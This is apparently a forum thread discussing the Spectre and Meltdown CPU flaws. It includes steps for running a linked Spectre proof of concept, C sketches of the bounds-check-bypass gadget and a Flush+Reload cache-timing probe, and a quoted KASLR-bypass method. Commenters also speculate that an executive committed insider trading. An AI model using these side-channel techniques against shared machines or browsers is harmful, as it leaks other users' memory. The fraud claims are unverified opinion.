Spectre PoC: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6 (I had to inline one #DEF, but otherwise works)
I’ve tested it with some success on FreeBSD/HardenedBSD on an Intel Xeon. It works on bare metal, but doesn’t work in bhyve.
oh god that runs quickly. terrifying.
That was kinda disappointing. (OpenBSD on Hyper-V here.)
It worked for me on OpenBSD running on real hardware.
perhaps it was the cache flush intrinsic.
I’m impressed by how easy it is to run this PoC - even for somebody who hasn’t done C programming in years. Just one file; correct the line
#define CACHE_HIT_THRESHOLD(80)
to
#define CACHE_HIT_THRESHOLD 80
then compile: gcc -O0 -o spectre spectre.c
run:
./spectre
and look for lines with “Success: “.
I’m wondering if there is a PoC in JavaScript for the browser - a single HTML page with no dependencies, containing everything needed to demonstrate the vulnerability?
I’ve been playing with the PoC a bit. It seems to work just fine on memory with PROT_WRITE only, but doesn’t work on memory protected with PROT_NONE. (At least on my CPU.)
Side topic: this may explain an odd story from two weeks ago about the Intel CEO selling all the shares he could. If he doesn’t have rock-solid documentation that the trade was planned before he learned of this, that’s probably insider trading. (Hat tip to @goodger for prompting me to look up the SEC rule in the chat.)
ETA: here’s the form 4 he filed. I’ve got to step out the door, but if anyone can figure out if this was reported to Intel before Nov 29 that would be interesting.
From the project zero blog post:
Good find. Looks like some press has it now, too. And a yc news commenter notes it’s not in their 10-Q, so that’s probably a couple counts in an indictment and a shareholder lawsuit.
Even if he knew, I think it matters whether this is a recurring event. If he always sells his shares at the end of the year, it would be insane to demand that he not do it this time.
Otherwise people could just start shorting as soon as they see an executive not selling stock, because they can infer now that there is some bad news incoming.
It’s public information, there’s no need to speculate. He doesn’t.
Matt Levine is relaying Intel comments that are the opposite of what you’re saying.
That article is pretty misleading. It’s true that the November sale was “pursuant to a pre-arranged stock sale plan with an automated sale schedule,” but that stock sale plan was pre-arranged only in October, months after Google had notified Intel of these vulnerabilities.
I thought these all had to be disclosed on Form 4s. Maybe there’s another reporting vehicle I’m unaware of, but “Krzanich’s plan seems to involve getting stock grants at the beginning of each year and then selling as much as he can in the fourth quarter, which he has done consistently for a few years.” is not an accurate description of the record in the linked form 4s. His sales happen in every quarter and this is the only time he’s sold down to Intel’s minimum (eyeballing rather than making a running total, but it seems clear).
tl;dr:
Meltdown is easy to exploit and gives access to kernel memory and other programs’ memory from userspace. Affects Intel CPUs. There is a kernel fix that more or less doubles the cost of context switches.
Spectre is hard to exploit and allows access to some other program’s memory. Affects all main CPU vendors who implement speculative execution. There is no fix, but some userspace mitigation should be possible, at the significant performance cost of preventing speculative execution.
And this in the Spectre paper is horrifying:
In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.
This is likely an unprecedentedly huge problem for the next several decades (thinking of all the enterprise and embedded systems this affects), and the “mitigation” sections of the papers are not encouraging.
I haven’t read about Spectre yet, but I read a paper from 2015 saying the same thing (?):
The spy in the sandbox: Practical cache attacks in javascript and their implications
We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim’s machine – to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today’s web, especially since most desktop browsers currently accessing the Internet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al. [23], allows a remote adversary to recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser.
So does anyone know if Spectre is worse than this?
https://scholar.google.com/scholar?cluster=1498045933646289522&hl=en&as_sdt=0,5&sciodt=0,5
To the best of my understanding, it builds on that work and is far, far worse.
Previously you could execute a timing attack (in JS) to observe the value of some piece of information that is being processed by the victim at the time your code runs.
My understanding is that now you can discern contents of a victim’s memory (that aren’t necessarily being touched at all by the victim) by doing something along the lines of:
- causing the CPU to speculatively execute loads that are dependent on the value of data that you’re not supposed to be permitted to read
- observing the effect of that speculated (and aborted) load on the state of the cache
- by observing the state of the cache, gleaning some information about what is in the memory that you aren’t supposed to be allowed to read
- because the attempt to read unreadable memory happened in a not-taken (only speculated) branch, it didn’t officially happen according to the ISA, so it doesn’t cause a segfault or anything that’d stop you carrying on with this nefarious deed
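Concretely, the core gadget looks something like the sketch below - paraphrased from memory from the example code in the Spectre paper (which the PoC linked elsewhere in this thread is based on), so treat the details as approximate:

/* Sketch of the Spectre variant-1 "bounds check bypass" gadget.
   Not a complete attack - just the speculatively-executed part. */
#include <stdint.h>
#include <stddef.h>

unsigned int array1_size = 16;
uint8_t array1[160];        /* in-bounds data; the "secret" lies beyond it */
uint8_t array2[256 * 512];  /* probe array: one cache line per byte value */
uint8_t temp;               /* keeps the compiler from optimizing the load away */

void victim_function(size_t x) {
    if (x < array1_size) {  /* the branch the attacker trains to "taken" */
        /* When x is out of bounds but the branch is mispredicted, this load
           still runs speculatively: the secret byte array1[x] selects which
           512-byte-spaced line of array2 is pulled into the cache. Registers
           get rolled back when the CPU notices; the cache state does not. */
        temp &= array2[array1[x] * 512];
    }
}

The rest of the attack is then: call victim_function() a few times with in-bounds x to train the predictor, flush array1_size and array2 from the cache, call it once with an out-of-bounds x, and time a read of each array2[i * 512] - the i whose line became a cache hit is the secret byte.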
I need to read this again to be sure, but I’m under the impression that Spectre is a relatively slow information leak that can be adapted to more or less any CPU with speculative execution, while Meltdown is a much faster - and hence more practical - attack that exploits specific foibles of specific Intel chips.
LWN’s write-up was at the right level for me. I’ll read the papers when I have time. https://lwn.net/SubscriberLink/742702/83606d2d267c0193/
PS: go subscribe to LWN, it’s great.
Another good tl;dr
This is the one that finally made me understand it - well, on a conceptual level.
Does OpenBSD mitigate Meltdown?
Not right now. I’m sure someone at OpenBSD is looking at it, though.
I’m curious if all the randomization protects machines.
/u/lattera is correct. From the Meltdown paper:
In 2013, kernel address space layout randomization (KASLR) had been introduced to the Linux kernel (starting from version 3.14) allowing to randomize the location of the kernel code at boot time. However, only as recently as May 2017, KASLR had been enabled by default in version 4.12. With KASLR also the direct-physical map is randomized and, thus, not fixed at a certain address such that the attacker is required to obtain the randomized offset before mounting the Meltdown attack. However, the randomization is limited to 40 bit.
Thus, if we assume a setup of the target machine with 8 GB of RAM, it is sufficient to test the address space for addresses in 8 GB steps. This allows to cover the search space of 40 bit with only 128 tests in the worst case. If the attacker can successfully obtain a value from a tested address, the attacker can proceed dumping the entire memory from that location. This allows to mount Meltdown on a system despite being protected by KASLR within seconds.
Emphasis my own.
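(To check the arithmetic on that: 8 GB is 2^33 bytes, so stepping through a 40-bit randomized range in 8 GB increments takes at most 2^40 / 2^33 = 2^7 = 128 probes.)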
No. Neither KARL from OpenBSD nor KASLR from NetBSD would mitigate either Meltdown or Spectre in the slightest. Meltdown and Spectre are due to bugs in the underlying hardware.
But how will you know which addresses to scan? How long would it take to scan a 64-bit address space?
The kernel virtual address space is MUCH more limited than 64 bits. Kernels are extremely leaky, too. And large. All you have to do is guess around the address space you think the kernel might be mapped at and work from there.
Additionally, KARL doesn’t randomize the address space. It randomizes the objects placed within it. So you’re still dealing with the same address space. Just start leaking data and parse it until you get something that makes sense.
On a lot of OSes, you might see some addresses that remain static in the kernel (VDSO, interrupt handlers, page tables, etc). Especially with physical address space instead of virtual.
Essentially, no matter what, there’s not enough entropy in the kernel address space to matter. And even if there was, these are hardware bugs, not software.
This is exactly why Linux is doing KPTI. It already had KASLR and that’s not effective. Randomizing the kernel address space, no matter how it’s done (KARL, KASLR, KASR) is worthless and ineffective.
Mitigations on the way from Chrome and Firefox.
Does anyone know: how can I see whether the version I have has these mitigation(s)? These announcements aren’t explicit about the version numbers that introduce the change.
Seems odd that project zero disclosed this six months ago and so many seem caught off guard. Was the problem only disclosed to CPU vendors and not to OS, compiler, browser vendors? And yet many of the mitigations are only now going into compilers+browsers?
The Firefox post has an update at the bottom listing the versions now. If you’re on the regular stable release they’re in 57.0.4, which was released on January 4.
The Arm developer site has a good overview of how this affects Arm processors. The whitepaper is also worth reading.
I wonder if an attacker could escalate privileges and/or achieve ring0 write access by combining Row Hammer with Meltdown and/or Spectre.
It occurs to me that, in a real and practical sense, one of the biggest exploit mitigations we have at our disposal is the inaccessibility of hardware and kernel architecture knowledge due to complexity. The real reason the systems I’m in charge of aren’t compromised right now (to my knowledge) is because it’s complicated and I’m not on the radar of the few people who can do it.
I can’t wait to explain this one to friends and family. “So let me get this straight. My computer is going to be slower once I patch it? Why would I do that?!?”
It seems like all of these issues could be resolved if the processor’s microcode (or the OS’s kernel) had explicit control over cache invalidation. Any microarchitecture researchers here that can comment on the existence of or any research on explicit cache control?
I’ve always wondered why the cache can’t be controlled explicitly, even in user mode code. It seems like a lot of performance is probably left on the table by having it automated. It’s like how using garbage collection (GC) can simplify code, but at the cost of throwing away information about memory usage and then having the GC try to guess that information in real time.
My understanding (from David May’s lectures and asking lots of questions) is that memory caches are far too much on the hot path (of everything, all the time) to be controlled by microcode.
I remember he mentioned some processor (research? not mainstream, I think) being made with a mechanism wherein you could set a constant in a special register that would be added to the low bits of every physical address before it hit the cache system, so that you could have some user-level control over which addresses alias each other. But I got the impression from that conversation that nobody had ever seriously considered putting more than one adder’s worth of gate delay into user control of a cache system, because it’s so important to performance. Nobody could think of amazingly useful ways for running code to customise cache behaviour that couldn’t already be achieved well enough using CPU features like prefetches or by cleverly changing the layout of your data structures.
I could imagine separate load/store instructions for uncached memory access, for example. ARM already has exclusive load/store in addition to the normal ones.
The architecture of snooping caches is ridiculously baroque.
Why is that? Afaik the only alternative is directory-based which has higher latency but scales better.
You could design for non-coherent caches with software controlled cache line sync. Most data is not shared but the overhead for shared data is imposed on all transactions.
Software control is probably even slower. One problem is that the compiler has to insert the management instructions without the dynamic information a cache has at runtime, which means a lot of unnecessary cache flushing.
If you go for software control, I would rather bet on fully software-managed scratchpad memory. There seems to be no consensus on how to use that well, though.
Very few memory locations are shared - probably fewer should be shared. Snooping caches are designed to compensate for software with no structure to shared variables.
Looking at the Spectre proof of concept code, it looks like there already actually is a way for user mode code to explicitly invalidate a cache line, and it’s used in the attack.
Perhaps a microcode patch could use this feature of the cache to invalidate any cache lines loaded by speculative execution?
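For reference, that user-mode mechanism is clflush, which is unprivileged on x86; paired with a timed reload it gives the classic Flush+Reload probe the PoC builds on. A minimal sketch (my own, not the PoC’s code; the threshold is CPU-dependent - 80 cycles is the PoC’s default):

#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, __rdtscp */

#define CACHE_HIT_THRESHOLD 80  /* cycles; tune per CPU */

/* Evict one cache line. clflush requires no privilege on x86. */
static void flush_line(volatile uint8_t *addr) {
    _mm_clflush((const void *)addr);
}

/* Time one load: a line that is already cached reloads far faster than
   one that was flushed. That timing difference is the side channel. */
static int is_cached(volatile uint8_t *addr) {
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*addr;                 /* the timed load */
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) < CACHE_HIT_THRESHOLD;
}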
There have been prototypes for a long time to make caches more secure with partitioning or randomization. I posted an example here in case anyone is curious about that sort of thing. Just Google those terms together with “cache” and “secure” to find many others.
Happy 2018, Lobsters!
Heartbleed might have been a small hole in the ship but these two are a full broadside.
AMD claims “zero vulnerability due to AMD architecture differences”, but without any explanation. Could someone enlighten us about this?
AMD’s inability to generate positive PR from this is really an incredible accomplishment for their fabled PR department.
The spectre PoC linked elsewhere in this thread works perfectly on my Ryzen 5. From my reading, it sounds like AMD processors aren’t susceptible to userspace reading kernelspace because the cache is in some sense protection-level-aware, but the speculative-execution, cache-timing one-two punch still works.
From reading the Google paper on this, it’s not quite true but not quite false. According to Google, AMD and ARM are vulnerable to a specific, limited form of Spectre. They’re not susceptible to Meltdown. The Google Spectre PoCs for AMD and ARM aren’t successful in accessing anything beyond the user’s memory space, so it’s thought that while the problem exists in some form, it doesn’t lead to compromise as far as we currently know.
Well, no compromise in the sense of breaking virtualization boundaries or OS-level protection boundaries, but still pretty worrying for compromising sandboxes that are entirely in one user’s memory space, like those in browsers.
I just found this in a Linux kernel commit:
AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.
Which is a much stronger statement than the one in AMD’s web PR story. Given that it is AMD, I would not be surprised if their design does not have the problem but their PR is unable to make that clear.
AMD is not vulnerable to Meltdown, an Intel-specific attack.
AMD (and ARM, and essentially anything with a speculative execution engine on the planet) is vulnerable to Spectre.
One more link. Nothing new, but a succinct review of issues and mitigations. https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
Another bonus link: https://www.raspberrypi.org/blog/why-raspberry-pi-isnt-vulnerable-to-spectre-or-meltdown/
Spectre/Meltdown documentation and resource collection repo
See also limitations of ASLR http://www.cs.vu.nl/~herbertb/download/papers/anc_ndss17.pdf
Reuters has a story with some quotes and a look at the research process.
I’ve read that some/most(?) Atom CPUs don’t have speculative execution or out-of-order execution. Is there a comprehensive list of x86_64 CPUs that have / don’t have those features?
I believe the only remotely recent Intel chips that completely lack speculative/OoO features are the Atoms based on the first-gen Bonnell microarchitecture. That started off 32-bit-only, but some of them towards the end of the run do have x86-64 support, e.g. the Atom D5xx and S12xx.
I believe next week a few people will start taking a look at alternative architectures. Maybe RISC-V just found an opening. A more diverse hardware landscape would be beneficial for society in general.
Why would I apply the patches against this on my home computer? One userspace process can steal from another userspace process? That’s just me and my one user.
And any javascript in your web browser, happily served to you without your knowledge by untrusted third parties.
Ah yes, fair enough.